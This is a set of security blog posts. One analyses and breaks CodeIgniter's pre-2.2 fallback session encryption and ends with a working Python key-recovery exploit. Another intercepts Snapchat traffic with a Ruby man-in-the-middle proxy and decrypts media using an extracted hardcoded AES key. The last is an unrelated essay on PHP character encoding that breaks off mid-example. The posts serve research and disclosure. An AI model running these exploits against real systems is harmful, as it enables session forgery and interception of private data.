How do we stop them modifying their own session data? You HMAC it. Of course, most people don’t actually use HMAC and instead just use H(k || m) or H(k || m || k) or whatever their “instincts” told them to do; the latter getting the job done while admitting a few attacks that a Sufficiently Capable (or Cashed Up) Adversary can follow through on; the former practically negligent (see length extension attack on Wikipedia; thanks to nikic for the correction).

So, we transmit the MAC — maybe you just append or prepend it to the session, or put it in a separate cookie, whatever — and then when we get a session back we authenticate it. If authentication fails, we don’t touch it, we throw it away; certainly we don’t try to e.g. unserialise it or anything. We didn’t produce it, so it’s a live wire.

That done, we now have “the user can’t modify their own session”, and this is a pretty good start. We have a secure storage mechanism, albeit one where the user can see their own session data.

We can tackle the “verify the session owner” point by storing IP and UA in the session as before; they can’t modify these values themselves, so an attacker can’t either. That said, they can see these values and realise they’re probably used in session authentication, which makes impersonating the user that much easier.

To finally achieve a desirable level of security, we might want to stop them from seeing their session data too. Thus we symmetrically encrypt the session data.

Done!

what’s one good way to screw this up?

Encryption without authentication. In other words, the user can’t see their session, but can modify it.

At first blush, this doesn’t sound so bad: they can’t know what they’re changing the data to, so changes are essentially random and astronomically unlikely to produce a “working” result.

In reality, it’s quite bad: if there’s any pattern to the encrypted data (i.e. it’s not indistinguishable from random noise), then it can be exploited; for example, to repeat or remove certain sections of the data. With enough analysis, you could even start crafting arbitrary results.

If the encryption algorithm used is reasonable, this shouldn’t be possible; any change should cause the decryption to fail or produce garbage results. This could still be a vector for an effective DoS, though.

what if the encryption algorithm used isn’t reasonable?

Let’s finally turn our attention to CodeIgniter. As a reminder, we’re looking at the pre-2.2 code, the latest release then being 2.1.4.

First, let’s look at their session storage mechanism, system/libraries/Session.php. It’s highly configurable (probably a bad thing); note these options and their meanings:

$sess_encrypt_cookie — do we encrypt the cookie? Defaults to false, but I bet we want this turned on.
$sess_use_database — do we stick the session data in the database? Defaults to false. Maybe it’s fine to leave this.
$encryption_key — sounds very important.

If we read the constructor, we see the encryption key is indeed required, regardless of whether the cookie itself is encrypted. Why would that be?

If we scroll down to _set_cookie, we can see something strange:

<?
if ($this->sess_encrypt_cookie == TRUE)
{
    $cookie_data = $this->CI->encrypt->encode($cookie_data);
}
else
{
    // if encryption is not used, we provide an md5 hash to prevent userside tampering
    $cookie_data = $cookie_data.md5($cookie_data.$this->encryption_key);
}

Pay close attention to the comment: they prevent userside tampering if encryption is not used. And if it is? Let’s have a look at Encrypt.php.

A brief scan of encode and decode strongly suggests that no authentication is done; this means we can change the data on the client-side with ease; there’s no MAC protecting it. The natural follow-up question is, can we make anything of this leeway?

say no to fallback

The header of encode has this to say about itself:

Encodes the message string using bitwise XOR encoding. The key is combined with a random hash, and then it too gets converted using XOR. The whole thing is then run through mcrypt (if supported) using the randomized key. The end result is a double-encrypted message string that is randomized with each call to this function, even if the supplied message and key are the same.

Do you see what I see?

Encodes the message string using bitwise XOR encoding. The key is combined with a random hash, and then it too gets converted using XOR. The whole thing is then run through mcrypt (if supported) using the randomized key. The end result is a double-encrypted message string that is randomized with each call to this function, even if the supplied message and key are the same.

mcrypt is old, and gets bad press for very valid reasons, but it provides some primitives that can work.

So if it’s not supported, we’re left with the rest of the trash in that paragraph. “The key is combined with a random hash, and then it too gets converted using XOR”. Converted?? what does that mean???

It’s worth calling out CodeIgniter’s own documentation here:

If Mcrypt is not available on your server the encoded message will still provide a reasonable degree of security for encrypted sessions or other such “light” purposes.

What the hell is a “light” purpose of encryption? Those inverted commas in the quoted portion are verbatim, I should add. Even they aren’t convinced that a “light” purpose of encryption exists, yet they claim encrypted sessions are such a case. Just the foundation of your site or app’s security, nbd.

Let’s find out just how bad an idea it is to have “fallback crypto” that you cooked up yourself. And here’s the thing: it’s going to get called. You don’t add fallback code without someone using it. This stuff is criminally bad; you can’t say “oh well, it’s a fallback, no-one should use it”. If that’s the case, remove it; fail to work without the dependency.

This is exactly what they did in 2.2, but there was a good eight years while this stuff was in HEAD. The fallback code got called.

how do you use key material? not like this… not like this.

Let’s start with encode:

<?
function encode($string, $key = '')
{
    $key = $this->get_key($key);
    if ($this->_mcrypt_exists === TRUE)
    {
        $enc = $this->mcrypt_encode($string, $key);
    }
    else
    {
        $enc = $this->_xor_encode($string, $key);
    }
    return base64_encode($enc);
}

$key wasn’t passed from the session library, so get_key is called with an empty string; that, in turn, does the following:

returns $this->encryption_key directly if it’s set. You can grep (or ag) the codebase quickly to find the only setter is set_key in the class, which isn’t called by CI itself.
fetches 'encryption_key' from the CI config. This is the same one that the Session class mandates is set, though Session doesn’t use it itself in encrypted-cookie mode.
surprisingly: returns the md5() of $key.

It’s surprising because the comment says: “Returns it as MD5 in order to have an exact-length 128 bit key”. But PHP’s md5, by default, returns the digest as a hexstring, not as raw data, meaning each byte will have four bits of entropy and not eight. It also means the mcrypt codepath might well be ignoring half the key.

There is a noteworthy remark on the mcrypt_encrypt changelog:

Changed in: 5.6.0

Invalid key and iv sizes are no longer accepted. mcrypt_encrypt() will now throw a warning and return FALSE if the inputs are invalid. Previously keys and IVs were padded with ‘\0’ bytes to the next valid size.

Outrageous.

Let’s move back to encode. $key now has the hexed MD5 of our actual encryption key (i.e. it’s a 32 byte string of hex digits). We throw the plaintext string and that MD5 into _xor_encode, base64 the result, and that’s our session cookie.

Let’s look at _xor_encode.

how not to use randomness

Reminder: $string is plaintext, $key is a 32-byte hexstring.

<?
function _xor_encode($string, $key)
{
    $rand = '';
    while (strlen($rand) < 32)
    {
        $rand .= mt_rand(0, mt_getrandmax());
    }
    $rand = $this->hash($rand);
    $enc = '';
    for ($i = 0; $i < strlen($string); $i++)
    {
        $enc .= substr($rand, ($i % strlen($rand)), 1)
              . (substr($rand, ($i % strlen($rand)), 1) ^ substr($string, $i, 1));
    }
    return $this->_xor_merge($enc, $key);
}

Let’s break it down:

We generate random numbers and concatenate them until we have more than 32 digits. That’s just bizarre.
We then call $this->hash on the random number string, which by default will just sha1() it, again returning a hexstring, this time 40 characters long.
We now iterate over each character of the plaintext and the $rand string, cycled.
- We append to $enc the byte from the $rand string.
- We then append to $enc the same byte XOR’d with the corresponding plaintext byte.
We then _xor_merge the $enc with $key.

In other words, if:

$rand looks like "RRRRRRR...", and
$string looks like "xxxx", then
$enc will look like "R*R*R*R*",

where 'R' ⊕ 'x' = '*'. We can XOR the pairs together to recover the plaintext.

Of course, we haven’t even used the key material yet. That’s entirely the domain of _xor_merge.

_xor_merge is defined as a “key + string” combiner by the header doc. Let’s see what that means.

<?
function _xor_merge($string, $key)
{
    $hash = $this->hash($key);
    $str = '';
    for ($i = 0; $i < strlen($string); $i++)
    {
        $str .= substr($string, $i, 1) ^ substr($hash, ($i % strlen($hash)), 1);
    }
    return $str;
}

$key as passed into the function is the hexstring of the MD5 of encryption_key. We then produce the hexed SHA1 of that, and perform a 1-to-1 XOR of $string[$i] with $hash[$i] for all $i; the hash being a cycled 40 characters. Remember that $string here is $enc above ("R*R*R*R*").

It’s important to note that these 40 hexadecimal characters are all that’s left of the key material, and they’re applied in ECB mode (like Snapchat, which I’ve written about). The main implication of this is that later blocks aren’t affected by earlier blocks; if we correctly decrypt byte k of the output, then we’ll also get every byte (k + Wn), where W is the width of the block.

Usually — using a strong block cipher mode — getting any part of a block wrong would ensure every subsequent block would be corrupted, as the plaintext output of the earlier blocks are fed into later ones. Not so with ECB, which they’ve unwittingly used. (Though “used” seems to be a bit of a stretch here.)

Call the hexed SHA1 key material "kkkkkkk...". We XOR this with the "R*R*R*R*" string, producing "9A9A9A9A". This is the final output.

Let’s review the entire process key material and plaintext takes to be encrypted, with some simplifications to make it readable in English:

A random SHA1 is produced ("RRRRRRR...").
We interleave characters of the plaintext ("xxxx") with the random data, XORing each plaintext byte against the respective random byte ("R*R*R*R*").
We take the SHA1 of the MD5 of the key ("kkkkkkk...").
We bytewise XOR this SHA1 against each byte of the plaintext–random pairs ("9A9A9A9A").

To recover the first byte of plaintext, then, looks like this:

Take the first two bytes of the ciphertext ("9A").
Take the SHA1 of the MD5 of the key ("kkkkkkk...")).
XOR the ciphertext bytewise with the SHA1 ("R*").
XOR the resulting pair of bytes ("x").

Note that the key material is only ever used in SHA1(MD5(key)) form. For our purposes, then, we only need to know the resulting SHA1; the source key doesn’t matter. To put it more clearly, we only need to recover the SHA1 output itself to break the effective key.

Looking at the above list of steps, we note that the SHA1 is only involved in the 3rd step; and moreover, this being a hexed SHA1, there’s only 8 bits of entropy across the two bytes, each byte taking 16 values.

(If you do the math, there’s actually only 6 bits; in the ASCII values of “0” through “9” and “a” through “f” bits 6 (always on) and 8 (always off) don’t change.)

XORs commute and associate, so we can be lazy and define the plaintext byte i as:

p[i] = c[2i] ^ c[2i+1] ^ k[2i mod 40] ^ k[2i+1 mod 40]

This is very straight forward. Simplicity is often a nice thing in crypto, but this is the wrong kind of simple.

Let’s say we already know p[i] for some i.

Knowing all of c, this tells us something about k[2i mod 40] and k[2i+1 mod 40]. Because there are some serious value restrictions on elements of k (being that there are only 16 possible values for a given element and not 256 like there should be), this lets us piece together k quite neatly, and thus all the elements of p we don’t know.

do we know the plaintext?

Do we know any p[i]? Well, what’s the plaintext? Session.php reveals all:

<?
$cookie_data = $this->_serialize($cookie_data);
…
$cookie_data = $this->CI->encrypt->encode($cookie_data);
…
setcookie(
    $this->sess_cookie_name,
    $cookie_data,
    $expire,
    $this->cookie_path,
    $this->cookie_domain,
    $this->cookie_secure
);

_serialize massages the data in a way we can ignore for our purposes before passing it through to PHP’s own serialize. So the session data is pure PHP serialised data. What does this look like?

Go up to sess_write; you’ll see $cookie_userdata is an array, which has keys set in a particular order: 'session_id', 'ip_address', 'user_agent', 'last_activity'.

It’s important to know that PHP arrays are both associative and ordered! The same datatype is used for both key–value dictionaries as well as integer-indexed arrays. This means order is present and preserved in $cookie_userdata, and this remains true for the serialised form.

If we fake our own $cookie_userdata in PHP and then serialise it, what would it look like? Here’s an example:

<?
echo serialize(array(
    // Session.php:317 shows that session IDs are hexed MD5, so always 32 chars
    'session_id' => '1234567890abcdef1234567890abcdef',  
    'ip_address' => '0.0.0.0',
    'user_agent' => 'welp/1.0',
    'last_activity' => 1455953571,
));

Here’s the output:

<?
a:4:{s:10:"session_id";s:32:"1234567890abcdef1234567890abcdef";s:10:"ip_address";
s:7:"0.0.0.0";s:10:"user_agent";s:8:"welp/1.0";s:13:"last_activity";i:1455953571;}

The format is pretty simple to glean from this. Excuse my pseudo-not-even-BNF:

object = array | string | integer
array = a : number : { (object ; object ;)* }
string = s : number : " (any-char)* "
integer = i : number

So what do we have after all this? The first two bytes of our known plaintext: a:.

let’s put this together

Here’s what we do: iterate over all 256 possible values of k[0] and k[1]; these correspond to p[0]. The rest of k doesn’t matter.

For each k, we calculate p′ = decrypt(k, c).
Check p′[0] == p[0].
If valid, we found k[0] and k[1]! In an average of 128 decrypt operations (which are just a bunch of XORs)! Continue on to p[1] and k[2] and k[3].

This can be done very, very fast.

This is actually slightly off; because of the weird keyspace and the fact that we’re XORing two parts of the key for one byte, (k[n], k[n+1]) = ('2', '1') works the same as it would if it were equal to ('3', '0'). You don’t necessarily get the exact SHA1 of the hex MD5 of the key, but you get one that works identically.

(In other words, there are even fewer distinct keys than there appear! Wow.)

We hit a slight hiccup because we don’t necessarily know the size of the session array, so the third byte of plaintext is unknown. But it doesn’t take too long to realise that k[0] and k[1] correspond not only to p[0], but also p[20], p[40], etc., because the key material is cycled (see above re: ECB).

Let’s align the known plaintext data in rows of 20 bytes:

a:4:{s:10:“session_i
d”;s:32:”1234567890a
bcdef1234567890abcde
f”;s:10:“ip_address”

In bold is everything we’re sure about. You can see that, in the first two blocks (rows) alone, we have enough known-plaintext to gather all 40 bytes of key data; we’re missing the 3rd byte in the first block, but we have the 3rd byte in the second block.

There is the concern that the session array may have more than 9 keys, making the unknown part of the first block one byte greater, in which case it looks like this:

a:12:{s:10:“session_
id”;s:32:”1234567890

This is fine; we get both bytes 3 and 4 from the second block. The same goes for many digits more, by which time we leave the realm of probability and cookie size limits.

And that’s it. We’ve done it. You can write an automated cracker based on this alone.

Here’s a PoC in action, artifically slowed down so you can watch its progress:

Too simple! Now that you have the key (or rather, the SHA1 of the MD5 hexstring of the key — good enough), you can feel free to change the data in the session, do what you like, and become whom you like. Maybe even realise that PHP serialisation admits arbitrary objects, which you might be able to do something special with.

If you liked the article, please share! I also welcome your feedback/thoughts on Twitter. Special thanks to Kairi for editing this article.

The PoC code follows. Enjoy!

#!/usr/bin/env python3

# CodeIgniter pre-2.2 non-mcrypt Encrypt reverser.
# Finds the key by partially-known plaintext attack.
# Written by Ashe Connor.  Placed in the public domain.

import codecs
import re
import sys
import time


def decode(s, key):
    r = bytearray()
    for i in range(len(s) // 2):
        r.append(s[i*2] ^ s[i*2+1] ^ key[(i*2)%40] ^ key[(i*2+1)%40])
    return bytes(r)


def find_key(known, encrypted):
    key = bytearray(b'0') * 40
    confirmed = [False] * 20

    hexstr = b'0123456789abcdef'

    ix = 0
    while not all(confirmed):
        if confirmed[ix%20]:
            ix += 1
            continue

        kcompb = known[ix::20]

        for k in range(256):
            key[(ix*2)%40] = hexstr[k&0xf]
            key[(ix*2+1)%40] = hexstr[k>>4]
            r = decode(encrypted, key)

            kcomp = kcompb
            rcomp = r[ix::20][:len(kcomp)]

            while True:
                try:
                    j = kcomp.index(b' ')
                except ValueError:
                    break
                kcomp = kcomp[:j] + kcomp[j+1:]
                rcomp = rcomp[:j] + rcomp[j+1:]

            if kcomp[0] == rcomp[0]:
                confirmed[ix%20] = True
                break

        if not confirmed[ix%20]:
            return None

        ix += 1

    return key


with open(sys.argv[1], 'r') as f:
    encrypted = f.read().split("\n", 2)[0]

encrypted = codecs.decode(encrypted.encode('ascii'), 'base64')

# Try each of these; space represents an unknown value.  Here we account for
# the unknown size of the session array in general.  We just need one byte of
# known plaintext for each index of the key, i.e. as long as there's at least
# one value in each 'column'.
knowns = ([
    b'a: :{s:10:"session_i' +
    b'd";s:32:"           '
,
    b'a:  :{s:10:"session_' +
    b'id";s:32:"          '
,
    b'a:   :{s:10:"session' +
    b'_id";s:32:"         '
])

key = None
for known in knowns:
    key = find_key(known, encrypted)
    if key:
        break

if not key:
    print("Could not recover key.")
    exit(1)

print(key.decode('ascii'))
print(decode(encrypted, key))

Snapchat: not for state secrets

2013-05-10T10:44:00Z

I use Snapchat. It’s an app where you can take a photo or short (< 10 second) video and send it to your friends who use the service; they’ll then be able to see it, once, before it disappears forever.

Ostensibly, the app is for sexting, because there’s no fear that your photo will get spread around (no forwarding/etc.) or retained for longer than you’d like, but it seems like it’s not as much a sexter’s hangout as the media might want you to think.

My circle of friends use it basically as an extension of weird Twitter – most snaps I send and receive are strange angles of weird objects; the completely mundane but somehow therapeutic (7 seconds of the camera pointed outside the window of a tram, pointed at the ground moving below); or just closeups of Curtis Stone’s face, wherever we see him.

Of course, the promise that they won’t get retained is just that: a promise. Since your phone receives this image and shows it to you at some point, it must be downloaded by your phone. If it can be downladed by the phone, it can be downloaded by something else. We decided to find out how.

My first thought was to use Cain to re-route the phone’s traffic to Snapchat via a computer with ARP poisoning, then Wireshark to packet-sniff. For whatever reason, we weren’t able to make this work; while we did see some of the traffic (the non-HTTPS stuff), HTTPS wouldn’t seem to pass through my friend’s computer.

Another got to work using a different set of tools on a Linux machine to do ARP stuff, and I took a more direct route.

First, I set my phone’s proxy on WiFi to point to my machine. Then I just listened with netcat. After receiving lots of apparently unrelated requests (and the aforementioned HTTP requests¹), I found that Snapchat was requesting an SSL forward:

$ nc -l -p 5588
CONNECT feelinsonice.appspot.com:443 HTTP/1.1
Host: feelinsonice.appspot.com

“feelinsonice”. Snapchat are hosted on GAE!

Having confirmed confirmed that this is a worthwhile approach, I wrote a little Ruby to receive requests and start coaxing data from Snapchat. The first iteration was something like this:

#!/usr/bin/env ruby

require 'openssl'
require 'socket'

l = TCPServer.new(5588)
l.listen(10)

while true
  s = l.accept

  d = s.readpartial(8192)
  if d !~ /CONNECT feelinsonice.appspot.com:443/
    STDERR.puts "rejecting unwanted client #{d.inspect}"
    s.close
    next
  end

  STDERR.puts "probably good client #{d.inspect}"

  ctx = OpenSSL::SSL::SSLContext.new("SSLv23_server")
  ctx.cert = OpenSSL::X509::Certificate.new(File.read("server.crt"))
  ctx.key = OpenSSL::PKey::RSA.new(File.read("server.key"))
  ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE

  s.write "HTTP/1.1 200 OK\r\n\r\n"
  s.flush

  ss = OpenSSL::SSL::SSLSocket.new(s, ctx)
  ss.accept

  STDERR.puts "I THINK WE'RE IN, JOHN."

  d = ss.readpartial(8192)
  STDERR.puts "got data: #{d.inspect}"

  ss.close
  s.close
end

To go with, I generated server.crt and server.key with CN *.appspot.com, wondering if Snapchat are checking for a valid cert or not.

Turns out they are: I was getting EOFError thrown at the last readpartial call, so presumably that was Snapchat not liking my identity.

Thankfully, the workaround wasn’t hard: make a local CA, install its certificate on the phone, re-generate the SSL certificate with that CA², and away we go!

Next, capture the data from the phone, and establish the connection to Snapchat ourselves to complete this man-in-the-middle. We put this after reading the first block of data from the client above:

# make the real connection
begin
  up = TCPSocket.new('feelinsonice.appspot.com', 443)
rescue Errno::ECONNREFUSED
  STDERR.puts "snapchat getting weary?"
  ss.close rescue false
  s.close rescue false
  next
end

ups = OpenSSL::SSL::SSLSocket.new(up.to_io)
ups.connect

ups.write(d)
STDERR.puts "forwarded request from phone"

while true
  begin
    r = ups.readpartial(1024)
  rescue EOFError
    STDERR.puts "no more"
    ss.close
    s.close
    break
  end
  STDERR.puts "they say: #{r.inspect}"

  # send back to phone
  ss.write(r)
  
  STDERR.puts "written back"

  break if r.length.zero?
end

STDERR.puts "quiet"

We open a regular SSL socket to Snapchat’s GAE server, forward the request from the phone, and read back what Snapchat said.

It turns out this is enough to start getting sensitive data in a form where we can attack it offline³.

Add some logging of responses to file; you’ll see a request to /ph/sync, followed by a bulk of data indicating who our friends are, and information regarding new snaps. Then, the phone will try to fetch those snaps: you’ll see requests to /ph/blob, like:

/ph/blob?id=...&username=hellomoto&timestamp=1368171438418&req_token=...

It turns out all the data required is in the URI; no funny header business. You can paste the requested URL directly into a browser and fetch the blob.

What you get is identified by the BSD file tool as data – not obviously an image, video, or whatever, nor any headers indicating encryption or compression.

First, I had a look at the size: 19,712 bytes, which is divisible by 256. This feels like too much of a coincidence; I’d be surprised by divisibility by anything above 4 or 8. My going assumption is that images are transferred in JPEG, and ~half the JPEGs I looked at on my disk have odd numbers of bytes, so I’m guessing there’s nothing frame-y about JPEG that would cause the plaintext to be in a regular block of bytes – so conclusion, it’s probably a block cipher.

Next, it was time to see if there were any obvious cryptographic errors. A repeated block in the ciphertext might give us a hint about the encryption mode.

Sure enough, a repeated 16-byte block:

> data = File.open('x', 'r:ASCII-8BIT').read; nil
=> nil
> data.bytes.each_slice(16).to_a.length
=> 1232
> data.bytes.each_slice(8).to_a.length
=> 2464
> data.bytes.each_slice(8).to_a.uniq.length
=> 2462
> data.bytes.each_slice(16).to_a.length
=> 1232
> data.bytes.each_slice(16).to_a.uniq.length
=> 1231
>

So apparently a 16-byte (128-bit) block cipher, in ECB mode at that. (Not a good thing.) Seeing as there wasn’t a demonstration of a lot of intelligence this far, I started to wonder if it wasn’t just XORed, as it’d look the same.

A friend on Twitter noted that the repeated block was at the same location as JPEG files have a string of repeated bytes.

Here’s a JPEG surrounding the repeated bytes:

00000a0: 090c 0b0c 180d 0d18 3221 1c21 3232 3232  ........2!.!2222
00000b0: 3232 3232 3232 3232 3232 3232 3232 3232  2222222222222222
00000c0: 3232 3232 3232 3232 3232 3232 3232 3232  2222222222222222
00000d0: 3232 3232 3232 3232 3232 3232 3232 ffc0  22222222222222..

Here’s the ciphertext around the repeated 16-byte blocks:

0000060: 61e0 3cb3 ca5d 4ebe 4cd9 2212 3e9a 40ba  a.<..]N.L.".>.@.
0000070: 39e4 8dc2 ac39 8f10 59d8 fc08 9d19 b239  9....9..Y......9
0000080: 39e4 8dc2 ac39 8f10 59d8 fc08 9d19 b239  9....9..Y......9
0000090: 4614 4d69 7c61 5d11 cabb 5310 1697 5b4f  F.Mi|a]...S...[O

Note that the 32 bytes are more than 2x 16-byte blocks in length: they extend well before and after the 16-byte alignment. But the ciphertext doesn’t show that at all: this rules out a plain repeating XOR, as we’d otherwise expect to see something more like this:

0000060: 61e0 3cb3 ca5d 4ebe 4cd9 2212 9d19 b239  a.<..]N.L."....9
0000070: 39e4 8dc2 ac39 8f10 59d8 fc08 9d19 b239  9....9..Y......9
0000080: 39e4 8dc2 ac39 8f10 59d8 fc08 9d19 b239  9....9..Y......9
0000090: 39e4 8dc2 ac39 8f10 59d8 fc08 9d19 5b4f  9....9..Y.....[O

… assuming the 32 bytes above are exactly the number you’d expect to find anywhere, which isn’t the case; but you get the point: there’d be some, but there are none. The key and data are totally mixed, which suggests a real block cipher.

Since there aren’t really good ways to attack this directly (at least, not for me, an utter novice), it seemed much faster just look for the cipher/key/etc. in the source.

I was thinking I’d have to do some MitM of Google Play or root my Android, but it turns out Googling ‘snapchat apk download’ is enough. Hah.

The first tool I found for getting the contents and decompiling the APK was android-apktool; there are surely better tools (this gives you smali output, not Java or Java-ish), but it was easy enough to peruse, given I just wanted to know what the key was and what primitives were being used.

The code was totally unobfuscated, so it wasn’t hard to find the com.snapchat.android.api.SnapchatServer: the .smali file is a bit weird to read, but sure enough there’s:

.field private static final BASE_URL:Ljava/lang/String; =
        "https://feelinsonice.appspot.com"

and:

.line 247
.local v2, image:[B
sget-object v6, Lcom/snapchat/android/util/AESEncrypt;->ENCRYPT_KEY_2:Ljava/lang/String;

invoke-static {v2, v6},
        Lcom/snapchat/android/util/AESEncrypt;->encrypt([BLjava/lang/String;)[B

move-result-object v0

.line 248
.local v0, encryptedImage:[B

I guess that’d be like:

// byte[] image;
byte[] encryptedImage = AESEncrypt.encrypt(image, AESEncrypt.ENCRYPT_KEY_2);

or something. I don’t actually do Java, so maybe that’s all backwards, but the point seems pretty clear. It occurs to me I’m reading the encryption code, but while there are two keys, only ENCRYPT_KEY_2 is ever used.

So, what encryption is going on? AESEncrypt.smali reads:

.line 8
const-string v0, "1234567891123456"

sput-object v0, Lcom/snapchat/android/util/AESEncrypt;->ENCRYPT_KEY:Ljava/lang/String;

.line 9
const-string v0, "M02cnQ51Ji97vwT4"

sput-object v0, Lcom/snapchat/android/util/AESEncrypt;->ENCRYPT_KEY_2:Ljava/lang/S

Here are the keys! Is it really as simple as 128-bit AES in ECB mode?

.line 21
const-string v3, "AES/ECB/PKCS5Padding"

Looks like it. Note the padding scheme; seems weird to use PKCS#5 which has apparently “only been defined for block ciphers that use 64 bit (8 byte) block size”, when the size here is 128-bit. Let’s give it a go.

> data = File.open('x', 'r:ASCII-8BIT').read; nil
=> nil
> c = OpenSSL::Cipher.new('AES-128-ECB')
=> #<OpenSSL::Cipher:0x007f8182658618>
> c.decrypt
=> #<OpenSSL::Cipher:0x007f8182658618>
> c.key = 'M02cnQ51Ji97vwT4'
=> "M02cnQ51Ji97vwT4"
> o = ''.force_encoding('ASCII-8BIT')
=> ""
> data.bytes.each_slice(16) {|s| o += c.update(s.map(&:chr).join)}
=> nil
> o += c.final; nil
=> nil
> o[0...60]
=> "\xFF\xD8\xFF\xE0\0\x10JFIF\0\x01\x01\0\0\x01\0\x01\0\0\xFF\xDB\0C\0\x14\x0E\
x0F\x12\x0F\r\x14\x12\x10\x12\x17\x15\x14\x18\x1E2!\x1E\x1C\x1C\x1E=,.$2I@LKG@FE
PZ"
>

JFIF! Hello! We got our man.

That’s as far as I got; it was at this stage that I thought of Googling the encryption key, to see if anyone else had tried this. Seems they had. Still, I’m glad it wasn’t until here that I searched.

Many thanks to the Matasano crypto challenges – some of the above came from knowledge picked up doing them.

The conclusion is that it’s easy to intercept and decrypt the data Snapchat on your phone receives; it’d be one, maybe two hours of work to turn the above code into something I could just switch on and forget about, while it happily archives every Snapchat I ever receive.

Truth be told, I can’t be bothered – it’s fun, and I don’t want to ruin the unique feeling it has by virtue of being an ephemeral medium – but don’t think it’s hard for someone who cared enough to.

To Flurry, a mobile analytics company, containing data like my phone model, screen res, probably some unique ID … ↩
I used this guide, but there are better ones out there which are probably more explanatory. ↩
Note that this client doesn’t speak HTTP; accordingly, it doesn’t know when to close the connection (GAE’s HTTP server sends the responses with Content-Length, so we should parse that and know when we’ve received all the data, but it’s easier just to restart the server over and over at this stage). ↩

Escapology: how, when and why to encode and escape

2012-04-18T11:10:00Z

As programmers, we spend a lot of time just carting data from one place to another. Sometimes that’s the entire purpose of a program or library (data conversion whatevers), but more often it’s just something that needs to happen in the course of getting a certain task done. When we’re sending a request, using a library, executing templates or whatever, it’s important to be 100% clear on the format of the data, which is a fancy way of saying how the data is encoded.

Let’s do the tacky dictionary thing:

encoding (plural encodings)

(computing) The way in which symbols are mapped onto bytes, e.g. in the rendering of a particular font, or in the mapping from keyboard input into visual text.

A conversion of plain text into a code or cypher form (for decoding by the recipient).

I think these senses are a bit too specific—if your data is in a computer in any form, then it’s already encoded. The keyboard doesn’t even have to come into it.

If you’re like me and you come from an English-speaking country, there’s a good chance that this might seem farfetched, or totally obvious but lacking in depth. The letter A is represented in ASCII by the integer 65, or hex 41.

From hereon, if I refer to a number with regular formatting, it’s decimal unless specified otherwise; likewise with code formatting, it’s hexadecimal.

You are also probably aware that non-Latin characters like 恋 do not have any mapping in ASCII, that people all tried to make their own ways to get around this—none of which interoperated particularly well—and that at some stage, a bunch of smart people decided to create Unicode, which assigns a unique integer codepoint to every character of every language (and then some), such that the character just mentioned is U+604b, and that there are character encodings, like UTF-8, which are used to represent the codepoints in a bytestream, such that 恋 becomes e6 81 8b.

This is all well and good. But what do you do with this stuff in your program?

Firstly, we need to straighten out what your environment does, or doesn’t do, with character encodings. I’m going to use PHP, Erlang and HTML as my examples, because they’re things I work with at work, and they each have slightly different ways of dealing with encoding ¹ owing to their internal representation of strings.

Secondly, I’m going to expand this beyond character encodings to any encoding—which is ultimately what I want to talk about here. We’re not just encoding the textual content for decoding into codepoints; we’re also often encoding data to put it within other data in a demarcated way. In this case, we tend to refer to escaping, but escaping and encoding are different ways of talking about the same process.

PHP

The best way to describe PHP’s character encoding is with the words “not at all”. Strings do not have metadata associated with encoding; to all string manipulation functions, a string might as well be an array of bytes, representing the raw bytes from the disk that occured between two ASCII " (22) characters.

In other words, PHP treats the input PHP file as byte soup—nominally ASCII.

Say I want to store 恋は戦争 ² in a string in PHP. I boot up my editor, open a new file called koi.php and enter:

<?

$koi = "恋は戦争";

echo $koi;

?>

What do I get?

Hey, the text displays correctly! PHP must be super-smart and it’s doing everything right! Right?

Maybe. My text-editor decided to save the file in UTF-8 by default. If I was in Japan and I dealt mostly with Japanese, it could be that I tended to save files in some popular non-Unicode encodings, like Shift JIS or ISO-2022-JP.

What happens if I resave the file in Shift JIS?

Mojibake! Character encoding issues are so common, Japanese has a word for it.

What happened? PHP actually has no idea about what the text is, encoding, whatever. When it looks at the file, it sees this:

0000000: 3c3f 0a0a 246b 6f69 203d 2022 97f6 82cd  <?..$koi = "....
0000010: 90ed 9188 223b 0a0a 6563 686f 2024 6b6f  ....";..echo $ko
0000020: 693b 0a0a 3f3e 0a                        i;..?>.

Note that we have a 22 at byte 0b, indicating the start of a string, and then another 22 at byte 14. I’m contending that the bytes between—i.e. 97 f6 82 cd 90 ed 91 88—are what gets stored in the string, without any further knowledge.

If this were the case, then strlen($koi) should be equal to 8 (despite there being 4 Japanese characters). I modify koi.php, still in Shift JIS:

<?

$koi = "恋は戦争";

echo strlen($koi) . "<br>\n";
echo $koi;

?>

And now?

Yappari. PHP has no clue what encoding the string is in—it’s just saving those bytes, counting them, and throwing them back out. So why does the UTF-8 one look alright in the browser and the Shift JIS one doesn’t?

The first tripping point is the webserver; the Apache on the machine I’m testing has this directive in a conffile:

AddDefaultCharset UTF-8

Sure enough, when we take a look at the headers sent on the wire:

HTTP/1.1 200 OK
Date: Wed, 18 Apr 2012 04:17:51 GMT
Server: Apache/2.2.11 (Fedora)
X-Powered-By: PHP/5.2.9
Content-Length: 14
Connection: close
Content-Type: text/html; charset=UTF-8

So the browser is trying to read the Shift JIS as UTF-8, hence mojibake. We can force that by adding an appropriate header() call, but it goes to show that PHP isn’t cognisant of what’s going on here.

Another grand example is using other built-in string functions. str_replace() and substr() are fraught with difficulty, no matter what encoding you use.

We haven’t even hit the fun stuff yet. What happens if we use another popular Japanese encoding, ISO-2022-JP? ISO-2022, also known as ECMA-35, is a standard for mechanisms for encoding foreign language text, and is used for Japanese in ISO-2022-JP, Chinese in ISO-2022-CN, and more, including extensions of the same.

Being a more complicated system, it fails to make some guarantees about the encoded data which other encodings do make; Shift JIS, for instance, does not use common ASCII special characters in its second byte, such as $. This means a $ symbol in Shift JIS-encoded text always means a $, whereas the letter A could occur as either a literal A, or as the second byte in a double-byte character ³.

Keeping in mind that ISO-2022-JP doesn’t exercise such care, let’s see what we get …

Uhhhh. What’s stored on the disk?

0000000: 3c3f 0a0a 246b 6f69 203d 2022 1b24 424e  <?..$koi = ".$BN
0000010: 7824 4f40 6f41 681b 2842 223b 0a0a 6563  x$O@oAh.(B";..ec
0000020: 686f 2073 7472 6c65 6e28 246b 6f69 2920  ho strlen($koi) 
0000030: 2e20 223c 6272 3e5c 6e22 3b0a 6563 686f  . "<br>\n";.echo
0000040: 2024 6b6f 693b 0a0a 3f3e 0a               $koi;..?>.

The ISO-2022-JP encoding of 恋は戦争 contains the byte-sequence 24 42 4e 78 24 4f, which is $BNx$O in ASCII—so PHP tries to interpolate variables so named.

Of course, this means even scarier things are possible. I replaced 恋は戦争 with あ—the Japanese letter “a”, essentially—and we get:

Whoops! On the disk:

0000000: 3c3f 0a0a 246b 6f69 203d 2022 1b24 4224  <?..$koi = ".$B$
